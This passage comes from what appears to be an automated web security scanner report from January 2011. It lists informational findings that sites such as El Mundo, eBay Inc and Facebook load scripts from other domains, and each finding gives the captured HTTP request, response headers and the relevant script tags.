The response dynamically includes the following scripts from other domains:
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://t.trackedlink.net/_dmpt.js
  • http://ultra1.clickchatsold.com/D6/asuk.js

Request

GET / HTTP/1.1
Host: www.dedipower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: symfony=6hvnhit5lq2d9qcjo8guti4nu0; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ultra1.clickchatsold.com/D6/asuk.js"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c9a06fe61633f20"></script>
...[SNIP]...
</script>

<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...

21.762. http://www.digitalia.be/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitalia.be
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google-analytics.com/ga.js

Request

GET / HTTP/1.1
Host: www.digitalia.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: 60gp=R477195302; path=/; expires=Thu, 27-Jan-2011 04:19:38 GMT
Date: Mon, 24 Jan 2011 16:04:51 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/5.3.5
X-UA-Compatible: IE=edge
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 53983

...<!DOCTYPE html>
<html lang="fr">
<head>
   <meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
   <title>digitalia.be</title>
   <meta name="DC.Language" content="fr" />
   <meta nam
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Recherche sur digitalia.be" href="/opensearch.xml" />
   <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<p><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

21.763. http://www.digitaltips.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitaltips.org
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://admin.brightcove.com/js/BrightcoveExperiences.js
  • http://d.yimg.com/mi/eu/ywa.js

Request

GET / HTTP/1.1
Host: www.digitaltips.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 13:13:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15408
Content-Type: text/html
Expires: Tue, 25 Jan 2011 13:12:49 GMT
Set-Cookie: ASPSESSIONIDQACCSATA=CBMAPNKCICCPLJELGPNDBBAG; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 106 - published
...[SNIP]...
<!-- By use of this code snippet, I agree to the Brightcove Publisher T and C found at https://accounts.brightcove.com/en/terms-and-conditions/. --> <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...

21.764. http://www.directstartv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directstartv.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://assets.percentmobile.com/percent_mobile.js
  • http://d.yimg.com/mi/ywa.js
  • http://edge.quantserve.com/quant.js
  • http://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=0vked70odhg1a3p6bv8i242j10; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Mon, 23-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=148575341; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=160872488; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Fri, 25-Mar-2011 16:05:28 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- Standard -->
   <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
       </script>
...[SNIP]...
<!--    BEGIN percentmobile-->
   <script src="http://assets.percentmobile.com/percent_mobile.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!--********** JAVASCRIPT **********-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

21.765. http://www.dynamicdrive.com/dynamicindex1/ddlevelsmenu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dynamicdrive.com
Path:   /dynamicindex1/ddlevelsmenu/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /dynamicindex1/ddlevelsmenu/ HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:11 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 25724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.766. http://www.dynamicdrive.com/forums/showthread.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dynamicdrive.com
Path:   /forums/showthread.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
  • http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js?v=381
  • http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js?v=381

Request

GET /forums/showthread.php HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:15 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: bbsessionhash=e29c1b7649b3da1e43c63d31de4eefad; path=/; HttpOnly
Set-Cookie: bblastvisit=1295913555; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...
<!-- / CSS Stylesheet -->

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js?v=381"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js?v=381"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

21.767. http://www.ebayinc.com/content/press_release/ebay_selects_joomla_open_source_to_foste

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebayinc.com
Path:   /content/press_release/ebay_selects_joomla_open_source_to_foste

Issue detail

The response dynamically includes the following script from another domain:
  • http://bit.ly/javascript-api.js?version=latest&login=ebayinc&apiKey=R_e1b5bff47ec217bf3977d79a2b226bc3

Request

GET /content/press_release/ebay_selects_joomla_open_source_to_foste HTTP/1.1
Host: www.ebayinc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:24 GMT
Set-Cookie: JSESSIONID=56B7E2F4F643F8C3234B643523676F33; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Length: 19418


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
<link rel="stylesheet" type="text/css" media="print" href="/assets/css/print.css" />
               <script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=ebayinc&apiKey=R_e1b5bff47ec217bf3977d79a2b226bc3"></script>
...[SNIP]...

21.768. http://www.echochrist.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.echochrist.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET / HTTP/1.1
Host: www.echochrist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:14:39 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html
Content-Length: 13522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:ice="http://ns.adobe.com/incontextediting
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.769. http://www.elmundo.es/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elmundo.es
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://active.cache.el-mundo.net/js/nielsen.js
  • http://active.cache.el-mundo.net/js/s_codeE.js
  • http://estaticos.elmundo.es/elmundo/js/carrusel.js
  • http://estaticos.elmundo.es/js/accordian.js
  • http://estaticos.elmundo.es/js/comunes.js
  • http://estaticos.elmundo.es/js/pestanas_portal.js
  • http://estaticos.elmundo.es/js/reproductor_imagenes.js

Request

GET / HTTP/1.1
Host: www.elmundo.es
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Date: Tue, 25 Jan 2011 05:05:15 GMT
Content-Type: text/html
Connection: close
Cache-Control: no-cache
X-Accel-Cache-Control: no-cache
Set-Cookie: ELMUNDO_idusr=TT5aC8CoFBUAAB8okbI-c2f1049e2d4516c17b18641aef04f3d5; expires=Fri, 24 Jan 2014 05:05:15 GMT; path=/; domain=.elmundo.es
Content-Length: 148754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://estaticos.elmundo.es/js/accordian.js"></script>
<script type="text/javascript" src="http://estaticos.elmundo.es/js/pestanas_portal.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://active.cache.el-mundo.net/js/nielsen.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="JavaScript" src="http://estaticos.elmundo.es/js/comunes.js"></script>
...[SNIP]...
<div class="reproductor sin_alineacion">
<script language="javascript" type="text/javascript" src="http://estaticos.elmundo.es/js/reproductor_imagenes.js"></script>
...[SNIP]...
</p>
<script type="text/javascript" src="http://estaticos.elmundo.es/elmundo/js/carrusel.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script language="JavaScript" type="text/javascript" src="http://active.cache.el-mundo.net/js/s_codeE.js"></script>
...[SNIP]...

21.770. http://www.equipmenttraderonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equipmenttraderonline.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.equipmenttraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:20 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 114576


<!-- dstolweb11-php5a -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Construction Equipment, Farm Equipment & Heavy Equipment on Equipment Trader</title>
   <
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.771. http://www.equipmenttraderonline.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equipmenttraderonline.com
Path:   /research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.equipmenttraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:48:20 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27279


<!-- dstolwebvm01-php5a -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Equipment Resources: Equipment loans, attachments, trailers, painting, transport, and
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.772. http://www.equipmenttraderonline.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equipmenttraderonline.com
Path:   /sell/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.equipmenttraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:22 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 25721


<!-- dstolweb06-php5a -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell your new or used equipment - EquipmentTraderOnline.com</title>
   <meta name="descri
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.773. http://www.espatial.com/contact/live-trial-adwords

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.espatial.com
Path:   /contact/live-trial-adwords

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://t2.trackalyzer.com/trackalyze.js
  • http://www.googleadservices.com/pagead/conversion.js

Request

GET /contact/live-trial-adwords HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:24 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31392

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification"
...[SNIP]...
<br />
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

21.774. http://www.everaldo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everaldo.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.everaldo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 PHP/4.4.9 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 4718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.everaldo.com/blog/?feed=rss2" />
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.775. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=fYoRD; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:00 GMT
Content-Length: 30560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/y-/r/dBLnf_Zodxa.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.776. http://www.facebook.com/%s

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /%s

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /%s HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=NgpY2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:49 GMT
Content-Length: 11704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.777. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=wYDCq; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 24 Jan 2011 16:05:02 GMT
Content-Length: 11725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.778. http://www.facebook.com/7NEWS

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /7NEWS

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /7NEWS HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=aYRu9; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:40 GMT
Content-Length: 174522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

21.779. http://www.facebook.com/LIMEprpromo

Summary

Severity:   Information
Confidence:   Certain
